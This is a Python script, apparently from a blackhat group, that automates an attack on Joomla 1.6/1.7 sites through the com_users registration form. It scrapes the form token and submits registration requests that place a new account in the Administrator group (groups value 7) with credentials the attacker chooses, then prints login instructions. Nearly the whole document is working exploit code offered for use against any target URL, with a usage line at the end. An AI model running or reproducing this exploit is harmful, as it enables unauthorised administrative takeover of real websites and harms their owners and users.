1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
| #!/usr/bin/python
# Joomla Com_User Auto Exploit
# By xSecurity
# Modif Sign by SunDi3yansyah | Surabaya Blackhat
import requests as sec4ever, re, urllib, sys, os
from threading import Thread
from time import sleep
def cls():
os.system(['clear','cls'][os.name =='nt'])
cls()
print '''
____ _ ____ _ _ _ _
/ ___| _ _ _ __ __ _| |__ __ _ _ _ __ _ | __ )| | __ _ ___| | _| |__ __ _| |_
\___ \| | | | '__/ _` | '_ \ / _` | | | |/ _` | | _ \| |/ _` |/ __| |/ / '_ \ / _` | __|
___) | |_| | | | (_| | |_) | (_| | |_| | (_| | | |_) | | (_| | (__| <| | | | (_| | |_
|____/ \__,_|_| \__,_|_.__/ \__,_|\__, |\__,_| |____/|_|\__,_|\___|_|\_\_| |_|\__,_|\__|
|___/
_ _
| _ _.._._ _|_ _ |_) _ |_) __|__|_ _ ._
|_(/_(_|| | | |_(_) |_)(/_ |_)(/_|_ |_(/_|
---------------------------------------------------------------------
Joomla Version [1.6|1.7] [Com_User] Auto Exploit
Require Need Install Requests Python Package (Cari di google)
--------------------------------------------------------------
Surabaya Blackhat | Surabaya Hackerlink | Yogyakarta Blackhat
--------------------------------------------------------------
Please wait...'''
pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'
def one(target,pwd1,pwd2,email):
# Wrong Password
x1 = xsec.get(target+'/index.php?option=com_users&view=registration')
token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)
post = {}
post["jform[name]"] = 'SunDi3yansyah'
post["jform[username]"] = user
post["jform[password1]"] = pwd1
post["jform[password2]"] = pwd2
post["jform[email1]"] = email
post["jform[email2]"] = email
post["jform[groups][]"] = "7"
post["option"] = "com_users"
post["task"] = "registration.register"
post[token[0]] = "1"
p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
def exploit(target,pwd1,pwd2,email):
# Wrong Password
x3 = xsec.get(target+'/index.php?option=com_users&view=registration')
token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)
post = {}
post["jform[name]"] = 'SunDi3yansyah'
post["jform[username]"] = user
post["jform[password1]"] = pwd1
post["jform[password2]"] = pwd1
post["jform[email1]"] = email
post["jform[email2]"] = email
post["jform[groups][]"] = "7"
post["option"] = "com_users"
post["task"] = "registration.register"
post[token[0]] = "1"
p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))
x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')
xsec = sec4ever.session()
if len(sys.argv) == 5:
target = sys.argv[1]
user = sys.argv[2]
pwd1 = sys.argv[3]
email = sys.argv[4]
one(target,pwd1,pwd2,email)
ex = exploit(target,pwd1,pwd2,email)
print ' * Go To Your Email & Active Then Login \n * Username: '+user+' & Password: '+pwd1
else:
print "Usage: python sbh.py http://target.com/ usermu passwordmu emailmu"
|
